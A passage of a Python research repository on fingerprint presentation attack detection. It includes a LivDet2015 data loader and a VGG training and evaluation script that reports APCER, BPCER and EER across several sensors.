is_classifier=True)\n\n def forward(self, x_real, x_fake):\n # forward pass encoder\n h_enc_real = self.encoder(x_real)\n h_enc_fake = self.encoder(x_fake)\n\n h_enc = [torch.cat([h_real, h_fake], dim=0) for h_real, h_fake in zip(h_enc_real, h_enc_fake)]\n\n # forward pass task-classifier\n h_task = self.task_classifier(h_enc[-1])\n\n # forward pass adv-classifier\n h_adv = self.adv_classifier(h_enc_fake[-1])\n\n return h_enc, h_task, h_adv\n \n def predict(self, x_real, x_fake):\n \n # forward pass encoder\n h_enc_real = self.encoder(x_real)\n h_enc_fake = self.encoder(x_fake)\n\n h_enc = [torch.cat([h_real, h_fake], dim=0) for h_real, h_fake in zip(h_enc_real, h_enc_fake)]\n\n # forward pass task-classifier\n h_task = self.task_classifier(h_enc[-1])\n \n probs = F.softmax(h_task[-1], dim=1)\n \n return probs\n\n\nif __name__ == '__main__':\n\n import os\n os.getcwd()\n os.chdir(\"./\")\n os.getcwd()\n print(os.getcwd())\n\n print()\n if torch.cuda.is_available():\n DEVICE = torch.device(\"cuda:0\") # you can continue going on here, like cuda:1 cuda:2....etc. \n print(\"Running on the GPU...\")\n else:\n DEVICE = torch.device(\"cpu\")\n print(\"Running on the CPU...\")\n print()\n \n num_materials = 3\n \n model = MLP_REG_FPAD(num_materials).to(DEVICE)\n\n print(model)" }, { "alpha_fraction": 0.7014778256416321, "alphanum_fraction": 0.7172414064407349, "avg_line_length": 26.45945930480957, "blob_id": "13dfbba06c458f3448dfcbc0d3f47255d4638508", "content_id": "06a0b39ac94da78307890918d8099cb606f414d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1015, "license_type": "no_license", "max_line_length": 48, "num_lines": 37, "path": "/II-GAN/utils/utils.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "from __future__ import print_function\nimport argparse\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom statistics import mean\nimport sys\nimport cv2\n\ndef normal_weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.2)\n elif classname.find('Linear') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.2)\n elif classname.find('BatchNorm') != -1:\n nn.init.normal_(m.weight.data, 0, 0.2)\n nn.init.constant_(m.bias.data, 0)\n\ndef _nanargmin(arr):\n try:\n return np.nanargmin(arr)\n except ValueError:\n return np.nan" }, { "alpha_fraction": 0.48242104053497314, "alphanum_fraction": 0.5141738057136536, "avg_line_length": 32.375, "blob_id": "91414bf54c37b403b7e5b0876ebe81d619282d55", "content_id": "b95e852b75af1d61f4e6a4752524b16038443e8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11747, "license_type": "no_license", "max_line_length": 147, "num_lines": 352, "path": "/VGG/data/data_vgg.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import torch\nfrom torch.utils.data import Dataset\nimport scipy.io as sio\nimport os\nimport numpy as np\nimport copy\nfrom sklearn.model_selection import train_test_split\nfrom torchvision import transforms\nimport sys\nimport math\nfrom PIL import Image\nfrom PIL import ImageOps\nimport cv2\nimport matplotlib.pyplot as plt\n\nclass numpyToTensor(object):\n \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n\n def __call__(self, sample):\n return torch.from_numpy(sample).float()\n \nBATCH_SIZE = 8\nMIN_WIDTH = -1\nMIN_HEIGHT = -1\n\nMIN_CROP_WIDTH = -1\nMIN_CROP_HEIGHT = -1\n\ndef get_data_loaders(path, dataset, test_material, croped=True, unseen_attack=False):\n \n global MIN_WIDTH \n global MIN_HEIGHT \n global MIN_CROP_WIDTH \n global MIN_CROP_HEIGHT \n global BATCH_SIZE\n \n if unseen_attack==True:\n \n if dataset == \"CrossMatch\":\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n real_train = np.array(range(1000))\n real_test = np.array(range(1000, 1500))\n MIN_WIDTH = 141\n MIN_HEIGHT = 205\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 247\n elif dataset == \"Digital_Persona\":\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.array(range(750))\n real_test = np.array(range(750, 1000))\n MIN_WIDTH = 109\n MIN_HEIGHT = 157\n MIN_CROP_WIDTH = 224\n MIN_CROP_HEIGHT = 235\n elif dataset == \"GreenBit\":\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.array(range(750))\n real_test = np.array(range(750, 997))\n MIN_WIDTH = 101\n MIN_HEIGHT = 149\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 271\n elif dataset == \"Hi_Scan\":\n BATCH_SIZE = 16\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.array(range(750))\n real_test = np.array(range(750, 1000))\n MIN_WIDTH = 163\n MIN_HEIGHT = 251\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 311\n elif dataset == \"Time_Series\":\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n real_train = np.array(range(2960))\n real_test = np.array(range(2960, 4440))\n MIN_WIDTH = 55\n MIN_HEIGHT = 49\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 225\n else:\n sys.exit(\"Error: incorrect dataset!\")\n \n \n train_materials = np.delete(materials_list, test_material)\n \n data = FPAD(path, dataset, material_idx=train_materials, real_idx=real_train, croped=croped)\n data_test = FPAD(path, dataset, material_idx=[test_material], real_idx=real_test, croped=croped)\n \n train_size = int(0.8 * len(data))\n val_size = len(data) - train_size\n data_train, data_val = torch.utils.data.random_split(data, [train_size, val_size])\n \n else:\n \n if dataset == \"CrossMatch\":\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n real_train = np.random.randint(low=0, high=1500, size=500)\n MIN_WIDTH = 141\n MIN_HEIGHT = 205\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 247\n elif dataset == \"Digital_Persona\":\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.random.randint(low=0, high=1000, size=250)\n MIN_WIDTH = 109\n MIN_HEIGHT = 157\n MIN_CROP_WIDTH = 224\n MIN_CROP_HEIGHT = 235\n elif dataset == \"GreenBit\":\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.random.randint(low=0, high=997, size=250)\n MIN_WIDTH = 101\n MIN_HEIGHT = 149\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 271\n elif dataset == \"Hi_Scan\":\n BATCH_SIZE = 16\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n real_train = np.random.randint(low=0, high=1000, size=250)\n MIN_WIDTH = 163\n MIN_HEIGHT = 251\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 311\n elif dataset == \"Time_Series\":\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n real_train = np.random.randint(low=0, high=4440, size=1480)\n MIN_WIDTH = 55\n MIN_HEIGHT = 49\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 225\n else:\n sys.exit(\"Error: incorrect dataset!\") \n \n \n train_materials = [test_material]\n \n dataset = FPAD(path, dataset, material_idx=train_materials, real_idx=real_train, croped=croped)\n \n train_size = int(0.8 * len(dataset))\n test_size = len(dataset) - train_size\n _dataset, data_test = torch.utils.data.random_split(dataset, [train_size, test_size])\n \n train_size = int(0.8 * len(_dataset))\n val_size = len(_dataset) - train_size\n data_train, data_val = torch.utils.data.random_split(_dataset, [train_size, val_size])\n \n \n print('\\n--------------------------------------')\n print('Train materials: ', end=\"\")\n for material in train_materials:\n print(materials_name[material], end=\" \")\n print('\\nTest material: {}'.format(materials_name[test_material]))\n \n #Data loaders\n \n params = {'batch_size': BATCH_SIZE,\n 'shuffle': True,\n 'num_workers': 0} \n \n train_loader = torch.utils.data.DataLoader(data_train, **params)\n valid_loader = torch.utils.data.DataLoader(data_val, **params)\n test_loader = torch.utils.data.DataLoader(data_test, **params)\n\n print('\\nDatasets size: Train {}, Val {}, Test {}'.format(len(data_train),\n len(data_val),\n len(data_test)))\n \n return train_loader, valid_loader, test_loader\n\n\n \nIMG_HEIGHT = -1 \nIMG_WIDTH = -1 \n\n\nclass FPAD(Dataset):\n def __init__(self,\n PATH,\n dataset,\n material_idx,\n real_idx,\n croped = True):\n\n self.material_idx = material_idx\n self.real_idx = real_idx\n self.dataset = dataset\n self.croped = croped\n \n if dataset == \"CrossMatch\" or dataset==\"Time_Series\":\n self.materials = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n else:\n self.materials = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n # Initialize X (data), y (real=1, fake=0), and f (fake material id) arrays\n X = []\n y = []\n f = []\n f_norm = []\n \n #PRESENTATION ATTACK SAMPLES\n \n count = 0\n \n for index in self.material_idx: \n \n if croped == False:\n self.fake_dir = PATH + dataset + \"/Fake/\" + self.materials[index] + \"/\"\n # read fake names\n txt_path = PATH + dataset + \"/\" + self.materials[index] + \".txt\"\n else:\n self.fake_dir = PATH + dataset + \"/Fake_c/\" + self.materials[index] + \"/\"\n # read fake names\n txt_path= PATH + dataset + \"/\" + self.materials[index] + \"_c.txt\"\n \n with open(txt_path, 'r') as file:\n fake_names = file.readlines()\n \n count = count + len(fake_names)\n \n X.extend(fake_names)\n y.extend([1]*len(fake_names))\n \n f.extend([index]*len(fake_names))\n f_norm.extend([index]*len(fake_names))\n \n self.n_presentation_attack_samples = count\n\n #BONAFIDE SAMPLES\n \n if croped == False:\n path = PATH + dataset + \"/real.txt\"\n else:\n path = PATH + dataset + \"/real_c.txt\"\n \n # read real names\n with open(path, 'r') as file:\n real_names = file.readlines()\n \n real_names = np.array(real_names)\n \n self.n_bonafide_samples = self.real_idx.shape[0]\n \n real_names = real_names[self.real_idx] \n\n # append real_data to X, y, and f arrays\n X.extend(real_names)\n y.extend([0]*self.n_bonafide_samples)\n f.extend([-1]*self.n_bonafide_samples)\n f_norm.extend([-1]*self.n_bonafide_samples)\n\n self.X = np.array(X)\n self.y = np.array(y)\n self.f = np.array(f)\n self.f_norm = np.array(f_norm)\n\n def __len__(self):\n return len(self.y)\n\n def __getitem__(self, idx):\n \n if torch.is_tensor(idx):\n idx = idx.tolist()\n \n img_name = self.X[idx]\n\n \n sample = Image.open(img_name.rstrip())\n width, height = sample.size\n \n sample = np.array(sample)/255.0\n \n if self.croped == True: \n \n \n sample = Image.fromarray(np.uint8(sample))\n width, height = sample.size\n \n \n left = int((width-MIN_CROP_WIDTH)/2)\n right = width - MIN_CROP_WIDTH - left\n top = int((height-MIN_CROP_HEIGHT)/2)\n bottom = height - MIN_CROP_HEIGHT - top\n \n sample = ImageOps.crop(sample, (left, top, right, bottom)) \n \n transformation = self.transformations()\n \n width, height = sample.size\n \n #Resize\n if width < height:\n ratio = 224/width\n else:\n ratio = 224/height\n \n ratio = math.ceil(ratio)\n \n #sample = sample.resize((width*ratio, height*ratio)) #AO FAZER ISTO NOS CROP SUBSTITUIR NEW_WIDTH POR MIN_WIDTH E NEW_HEIGHT POR MIN_HEIGHT\n \n sample = np.array(sample)\n \n if self.dataset == \"Digital_Persona\":\n \n sample = sample[:,:,0]\n sample = np.transpose(sample)\n \n \n sample.reshape((1, sample.shape[0], sample.shape[1]))\n \n sample = cv2.merge((sample, sample, sample))\n \n return transformation(sample).view((3, sample.shape[0], sample.shape[1])), self.y[idx], self.f[idx], self.f_norm[idx]\n \n def transformations(self):\n data_transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n return data_transform\n \n#%%\n \nif __name__ == '__main__':\n\n \n train, val, test = get_data_loaders(\"L:/FPAD/Dataset/LivDet2015/train/\", \"GreenBit\", 0, croped=True, unseen_attack=True)\n\n for i, (x, y, f, _) in enumerate(train):\n print(x.shape)\n print(y.shape)\n print(f.shape)\n \n x = x[f==-1]\n \n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2)\n ax1.axis(\"off\")\n ax1.imshow(x[0,0,...], 'gray')\n ax2.axis(\"off\")\n ax2.imshow(x[1,0,...], 'gray')\n ax3.axis(\"off\")\n ax3.imshow(x[2,0,...], 'gray')\n ax4.axis(\"off\")\n ax4.imshow(x[3,0,...], 'gray')\n fig.show()\n break" }, { "alpha_fraction": 0.4916198253631592, "alphanum_fraction": 0.5105881094932556, "avg_line_length": 40.69037628173828, "blob_id": "257c8ef507f544e264ada31b8d4cff2ca58d95f1", "content_id": "a5c15ed8817fba6ce65a3f92ea3b762e0b90bfaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19928, "license_type": "no_license", "max_line_length": 461, "num_lines": 478, "path": "/VGG/run_vgg_fpad.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import argparse\nimport os\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.nn import functional as F\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\nfrom statistics import mean\nimport pickle\nimport math\nimport sys\nimport torchvision.models as models\n\nsys.path.insert(0, 'utils/')\nsys.path.insert(0, 'data/')\nsys.path.insert(0, 'models/')\nsys.path.insert(0, 'layers/')\n\nfrom vgg_utils import _nanargmin, set_parameter_requires_grad\nfrom data_vgg import get_data_loaders\n\n#%% \n\nEPOCHS = 50\n\nloss_fn = F.cross_entropy\n\nLEARNING_RATE = 1e-04\nREG = 1e-04\n\ndef fit(model, data, device, model_path, output):\n # train and validation loaders\n train_loader, valid_loader = data\n print(\"Train/Val batches: {}/{}\".format(len(train_loader),\n len(valid_loader)))\n\n # Set the optimizer\n optimizer = torch.optim.Adam(model.parameters(),\n lr=LEARNING_RATE,\n weight_decay=REG)\n\n # Start training\n train_history = {'train_loss': [], 'train_acc': [], 'train_apcer': [], 'train_bpcer': [], 'train_eer': [], 'train_bpcer_apcer1': [], 'train_bpcer_apcer5': [], 'train_bpcer_apcer10': [], 'train_apcer1': [], 'train_apcer5': [], 'train_apcer10': [],\n 'val_loss': [], 'val_acc': [], 'val_apcer': [], 'val_bpcer': [], 'val_eer': [], 'val_bpcer_apcer1': [], 'val_bpcer_apcer5': [], 'val_bpcer_apcer10': [], 'val_apcer1': [], 'val_apcer5': [], 'val_apcer10': []}\n\n # Best validation params\n best_val = -float('inf')\n best_epoch = 0\n\n for epoch in range(EPOCHS):\n print('\\nEPOCH {}/{}\\n'.format(epoch + 1, EPOCHS))\n\n # TRAINING\n # set model to train\n model.train()\n for i, (x, y, f, _) in enumerate(train_loader): # iterations loop\n # send mini-batch to gpu\n x = x.to(device)\n \n y = y.type(torch.LongTensor)\n y = y.to(device)\n \n f = f.type(torch.LongTensor)\n f = f.to(device)\n\n # print('y')\n # print(y)\n # print('f')\n # print(f)\n\n # forward pass\n y_pred = model(x)\n\n # Compute vae loss\n loss = loss_fn(y_pred, y)\n\n # Backprop and optimize\n optimizer.zero_grad() # clear previous gradients\n loss.backward() # compute new gradients\n optimizer.step() # optimize the parameters\n\n # display the mini-batch loss\n sys.stdout.write(\"\\r\" + '........{}-th mini-batch loss: {:.3f}'.format(i, loss.item()))\n sys.stdout.flush()\n \n # Validation\n tr_loss, tr_acc, tr_apcer, tr_bpcer, tr_eer, tr_bpcer_apcer1, tr_bpcer_apcer5, tr_bpcer_apcer10, tr_apcer1, tr_apcer5, tr_apcer10 = eval_model(model, train_loader, device)\n train_history['train_loss'].append(tr_loss.item())\n train_history['train_acc'].append(tr_acc)\n train_history['train_apcer'].append(tr_apcer)\n train_history['train_bpcer'].append(tr_bpcer)\n train_history['train_eer'].append(tr_eer)\n train_history['train_bpcer_apcer1'].append(tr_bpcer_apcer1)\n train_history['train_bpcer_apcer5'].append(tr_bpcer_apcer5)\n train_history['train_bpcer_apcer10'].append(tr_bpcer_apcer10)\n train_history['train_apcer1'].append(tr_apcer1)\n train_history['train_apcer5'].append(tr_apcer5)\n train_history['train_apcer10'].append(tr_apcer10)\n\n val_loss, val_acc, val_apcer, val_bpcer, val_eer, val_bpcer_apcer1, val_bpcer_apcer5, val_bpcer_apcer10, val_apcer1, val_apcer5, val_apcer10 = eval_model(model, valid_loader, device)\n train_history['val_loss'].append(val_loss.item())\n train_history['val_acc'].append(val_acc)\n train_history['val_apcer'].append(val_apcer)\n train_history['val_bpcer'].append(val_bpcer)\n train_history['val_eer'].append(val_eer)\n train_history['val_bpcer_apcer1'].append(val_bpcer_apcer1)\n train_history['val_bpcer_apcer5'].append(val_bpcer_apcer5)\n train_history['val_bpcer_apcer10'].append(val_bpcer_apcer10)\n train_history['val_apcer1'].append(val_apcer1)\n train_history['val_apcer5'].append(val_apcer5)\n train_history['val_apcer10'].append(val_apcer10)\n\n\n # save best validation model\n if best_val < val_acc:\n torch.save(model.state_dict(), model_path + 'vgg_fpad.pth')\n best_val = val_acc\n best_epoch = epoch\n\n # display the training loss\n print()\n print('\\n>> Train loss: {:.3f} |'.format(tr_loss.item()) + ' Train Acc: {:.3f}'.format(tr_acc) + '\\n Train APCER: {:.3f} |'.format(tr_apcer) + ' Train BPCER: {:.3f}'.format(tr_bpcer) + '\\n Train EER: {:.3f}'.format(tr_eer))\n\n print('\\n>> Valid loss: {:.3f} |'.format(val_loss.item()) + ' Valid Acc: {:.3f}'.format(val_acc) + '\\n Valid APCER: {:.3f} |'.format(val_apcer) + ' Valid BPCER: {:.3f}'.format(val_bpcer) + '\\n Valid EER: {:.3f}'.format(val_eer))\n\n print('\\n>> Best model: {} / Acc={:.3f}'.format(best_epoch+1, best_val))\n print()\n\n # save train/valid history\n plot_fn = output + 'vgg_fpad_history.png'\n plot_train_history(train_history, plot_fn=plot_fn)\n\n # return best validation model\n model.load_state_dict(torch.load(model_path + 'vgg_fpad.pth'))\n\n return model, train_history, valid_loader, best_epoch+1\n\n\ndef plot_train_history(train_history, plot_fn=None):\n plt.switch_backend('agg')\n\n best_val_epoch = np.argmin(train_history['val_loss'])\n best_val_acc = train_history['val_acc'][best_val_epoch]\n best_val_loss = train_history['val_loss'][best_val_epoch]\n plt.figure(figsize=(7, 5))\n epochs = len(train_history['train_loss'])\n x = range(epochs)\n plt.subplot(211)\n plt.plot(x, train_history['train_loss'], 'r-')\n plt.plot(x, train_history['val_loss'], 'g-')\n plt.plot(best_val_epoch, best_val_loss, 'bx')\n plt.xlabel('Epoch')\n plt.ylabel('Train/Val loss')\n plt.legend(['train_loss', 'val_loss'])\n plt.axis([0, epochs, 0, max(train_history['train_loss'])])\n plt.subplot(212)\n plt.plot(x, train_history['train_acc'], 'r-')\n plt.plot(x, train_history['val_acc'], 'g-')\n plt.plot(best_val_epoch, best_val_acc, 'bx')\n plt.xlabel('Epoch')\n plt.ylabel('Train/Val acc')\n plt.legend(['train_acc', 'val_acc'])\n plt.axis([0, epochs, 0, 1])\n if plot_fn:\n #plt.show()\n plt.savefig(plot_fn)\n plt.close()\n else:\n plt.show()\n\n\ndef eval_model(model, data_loader, device, debug=False):\n with torch.no_grad():\n\n model.eval()\n \n loss_eval = 0\n N = 0\n n_correct = 0\n \n TP = 0\n TN = 0\n FP = 0\n FN = 0\n \n PA = 0\n BF = 0\n \n eer_list = []\n \n BPCER_APCER1_list = []\n BPCER_APCER5_list = []\n BPCER_APCER10_list = []\n \n APCER1_list = []\n APCER5_list = []\n APCER10_list = []\n \n for i, (x, y, f, _) in enumerate(data_loader):\n # send mini-batch to gpu\n x = x.to(device)\n \n y = y.type(torch.LongTensor)\n y = y.to(device)\n \n f = f.type(torch.LongTensor)\n f = f.to(device)\n\n # forward pass \n y_pred = model(x)\n\n # Compute cnn loss\n loss = loss_fn(y_pred, y)\n loss_eval += loss * x.shape[0]\n\n # Compute Acc\n N += x.shape[0]\n ypred_ = torch.argmax(y_pred, dim=1)\n n_correct += torch.sum(1.*(ypred_ == y)).item()\n \n y = y.cpu().numpy()\n ypred_ = ypred_.cpu().numpy()\n \n # Biometric metrics\n \n TP += np.sum(np.logical_and(ypred_, y))\n TN += np.sum(np.logical_and(1-ypred_, 1-y))\n \n FP += np.sum(np.logical_and(ypred_, 1-y))\n FN += np.sum(np.logical_and(1-ypred_, y))\n \n PA += np.sum(y == 0)\n BF += np.sum(y == 1)\n \n \n probs = torch.nn.functional.softmax(y_pred, dim=0)\n\n probs = probs.cpu().numpy()\n\n probs = probs[:, 1]\n \n fpr, tpr, threshold = metrics.roc_curve(y, probs)\n fnr = 1 - tpr \n \n BPCER_APCER1_list.append(fpr[(np.abs(fnr - 0.01)).argmin()])\n BPCER_APCER5_list.append(fpr[(np.abs(fnr - 0.05)).argmin()])\n BPCER_APCER10_list.append(fpr[(np.abs(fnr - 0.1)).argmin()])\n \n APCER1_list.append(fnr[(np.abs(fnr - 0.01)).argmin()])\n APCER5_list.append(fnr[(np.abs(fnr - 0.05)).argmin()])\n APCER10_list.append(fnr[(np.abs(fnr - 0.1)).argmin()])\n \n index = _nanargmin(np.absolute((fnr - fpr)))\n if math.isnan(index) == False:\n eer_list.append(fpr[index])\n\n loss_eval = loss_eval / N\n acc = n_correct / N\n APCER = (FP * 1.) / (FP + TN)\n BPCER = (FN * 1.) / (FN + TP)\n \n BPCER_APCER1=mean(BPCER_APCER1_list)\n BPCER_APCER5=mean(BPCER_APCER5_list)\n BPCER_APCER10=mean(BPCER_APCER10_list)\n \n APCER1=mean(APCER1_list)\n APCER5=mean(APCER5_list)\n APCER10=mean(APCER10_list)\n \n if eer_list != []:\n EER = mean(eer_list)\n else:\n EER = -1000000000\n \n return loss_eval, acc, APCER, BPCER, EER, BPCER_APCER1, BPCER_APCER5, BPCER_APCER10, APCER1, APCER5, APCER10 \n\n\ndef main():\n \n IMG_PATH = \"/ctm-hdd-pool01/DB/LivDet2015/train/\"\n \n print()\n if torch.cuda.is_available():\n DEVICE = torch.device(\"cuda:0\") # you can continue going on here, like cuda:1 cuda:2....etc. \n print(\"Running on the GPU\")\n else:\n DEVICE = torch.device(\"cpu\")\n print(\"Running on the CPU\")\n \n mode = input(\"Enter the mode [train/test]: \")\n #DATASET = input(\"Dataset [CrossMatch/Digital_Persona/GreenBit/Hi_Scan/Time_Series]: \")\n unseen_ = input(\"Unseen attack? [y/n]: \")\n \n if unseen_ == \"y\":\n unseen = True\n NUM_ITERATIONS = 1\n attack_txt = \"UA\"\n elif unseen_ == \"n\":\n unseen = False \n NUM_ITERATIONS = 3\n attack_txt = \"OA\"\n else:\n sys.exit(\"Error ('Unseen attack?'): incorrect input!\")\n \n sensors = [\"CrossMatch\", \"Digital_Persona\", \"GreenBit\", \"Hi_Scan\", \"Time_Series\"] \n \n for DATASET in sensors:\n \n print(\"\\nRunning in \" + DATASET + \"...\\n\")\n \n if DATASET == \"CrossMatch\" or DATASET==\"Time_Series\":\n NUM_MATERIALS = 3\n else:\n NUM_MATERIALS = 4\n \n # For LOOP - Test splits\n train_results_ = []\n results = []\n best_epochs = [] \n \n for iteration in range(NUM_ITERATIONS):\n \n print(\"\\n-- ITERATION {}/{} --\".format(iteration+1, NUM_ITERATIONS))\n \n for test_material in range(NUM_MATERIALS):\n \n output_fn = \"results/\" + DATASET + \"/\" + DATASET + \"_\" + str(test_material) + \"_\"\n model_path = \"/ctm-hdd-pool01/afpstudents/jaf/VGG19bn_\" + DATASET + \"_\" + str(test_material) + \"_\"\n \n model = models.vgg11_bn(pretrained=True)\n set_parameter_requires_grad(model, feature_extracting=False)\n num_ftrs = model.classifier[6].in_features\n model.classifier[6] = nn.Linear(num_ftrs,2)\n \n model = model.to(DEVICE)\n \n # Train or test\n if mode == 'train':\n \n (train_loader, valid_loader, test_loader) = get_data_loaders(IMG_PATH, DATASET, test_material, croped=True, unseen_attack=unseen)\n \n \n # Fit model\n model, train_history, _, best_epoch = fit(model=model,\n data=(train_loader, valid_loader),\n device=DEVICE,\n model_path = model_path, \n output=output_fn)\n \n # save train history\n train_res_fn = output_fn + \"history.pckl\"\n pickle.dump(train_history, open(train_res_fn, \"wb\"))\n \n elif mode == 'test':\n sys.exit(\"Error: in construction yet!\")\n '''\n model.load_state_dict(torch.load(\n os.path.join(*(output_fn, 'mlp_fpad.pth'))))\n \n # load train history\n res_fn = os.path.join(*(output_fn, '_history.pckl'))\n train_history = pickle.load(open(res_fn, \"rb\"))\n plot_fn = os.path.join(*(output_fn, 'mlp_fpad_history.png'))\n plot_train_history(train_history, plot_fn=plot_fn)\n '''\n else:\n sys.exit(\"Error: incorrect mode!\")\n \n #Train results\n train_results = pickle.load(open(train_res_fn, \"rb\"))\n train_results_.append([train_results['train_acc'][EPOCHS-1], train_results['train_apcer'][EPOCHS-1], train_results['train_bpcer'][EPOCHS-1], train_results['train_eer'][EPOCHS-1], train_results['train_bpcer_apcer1'][EPOCHS-1], train_results['train_bpcer_apcer5'][EPOCHS-1], train_results['train_bpcer_apcer10'][EPOCHS-1], train_results['train_apcer1'][EPOCHS-1], train_results['train_apcer5'][EPOCHS-1], train_results['train_apcer10'][EPOCHS-1]])\n \n # Test results\n test_loss, test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10 = eval_model(model, test_loader, DEVICE)\n print('\\nTest loss: {:.3f} |'.format(test_loss.item()) + ' Test Acc: {:.3f}'.format(test_acc) + '\\nTest APCER: {:.3f} |'.format(test_apcer) + ' Test BPCER: {:.3f}'.format(test_bpcer)) \n print('Test BPCER@APCER=1%: {:.3f} | Test APCER1: {:.3f}'.format(test_bpcer_apcer1, test_apcer1))\n print('Test BPCER@APCER=5%: {:.3f} | Test APCER5: {:.3f}'.format(test_bpcer_apcer5, test_apcer5))\n print('Test BPCER@APCER=10%: {:.3f} | Test APCER10: {:.3f}'.format(test_bpcer_apcer10, test_apcer10))\n print('Test EER: {:.3f}'.format(test_eer))\n results.append((test_loss.item(), test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10))\n \n best_epochs.append(best_epoch)\n \n # save results\n res_fn = output_fn + 'results.pckl'\n pickle.dump(results, open(res_fn, \"wb\"))\n results = pickle.load(open(res_fn, \"rb\"))\n \n \n \n # Compute average and std\n acc_array = np.array([i[1] for i in results])\n apcer_array = np.array([i[2] for i in results])\n bpcer_array = np.array([i[3] for i in results])\n eer_array = np.array([i[4] for i in results])\n bpcer_apcer1_array = np.array([i[5] for i in results])\n bpcer_apcer5_array = np.array([i[6] for i in results])\n bpcer_apcer10_array = np.array([i[7] for i in results])\n apcer1_array = np.array([i[8] for i in results])\n apcer5_array = np.array([i[9] for i in results])\n apcer10_array = np.array([i[10] for i in results])\n \n print('\\n\\n\\n---------------------------------\\n-------------------------------------------')\n print('Average Acc: {:.3f} |'.format(np.mean(acc_array)) + ' Std: {:.3f}'.format(np.std(acc_array)))\n print('Average APCER: {:.3f} |'.format(np.mean(apcer_array)) + ' Std: {:.3f}'.format(np.std(apcer_array)))\n print('Average BPCER: {:.3f} |'.format(np.mean(bpcer_array)) + ' Std: {:.3f}'.format(np.std(bpcer_array)))\n print('Average EER: {:.3f} |'.format(np.mean(eer_array)) + ' Std: {:.3f}'.format(np.std(eer_array)))\n print('Average BPCER@APCER=1%: {:.3f} |'.format(np.mean(bpcer_apcer1_array)) + ' Std: {:.3f}'.format(np.std(bpcer_apcer1_array)))\n print('Average BPCER@APCER=5%: {:.3f} |'.format(np.mean(bpcer_apcer5_array)) + ' Std: {:.3f}'.format(np.std(bpcer_apcer5_array)))\n print('Average BPCER@APCER=10%: {:.3f} |'.format(np.mean(bpcer_apcer10_array)) + ' Std: {:.3f}'.format(np.std(bpcer_apcer10_array)))\n print('Average APCER1: {:.3f} |'.format(np.mean(apcer1_array)) + ' Std: {:.3f}'.format(np.std(apcer1_array)))\n print('Average APCER5: {:.3f} |'.format(np.mean(apcer5_array)) + ' Std: {:.3f}'.format(np.std(apcer5_array)))\n print('Average APCER10: {:.3f} |'.format(np.mean(apcer10_array)) + ' Std: {:.3f}'.format(np.std(apcer10_array)))\n \n #Best epochs\n print('\\nBest epochs:', end=\" \")\n for epoch in best_epochs:\n print(epoch, end=\" \")\n \n #Results of all loops (train and test)\n np.set_printoptions(formatter={'float': '{: 0.3f}'.format})\n print()\n print()\n print(\"*** \" + DATASET + \" RESULTS ***\")\n print()\n print(\">>Train results [Acc, APCER, BPCER, EER, BPCER@APCER=1%, BPCER@APCER=5%, BPCER@APCER=10%, APCER1, APCER5, APCER10]\")\n print()\n for k in 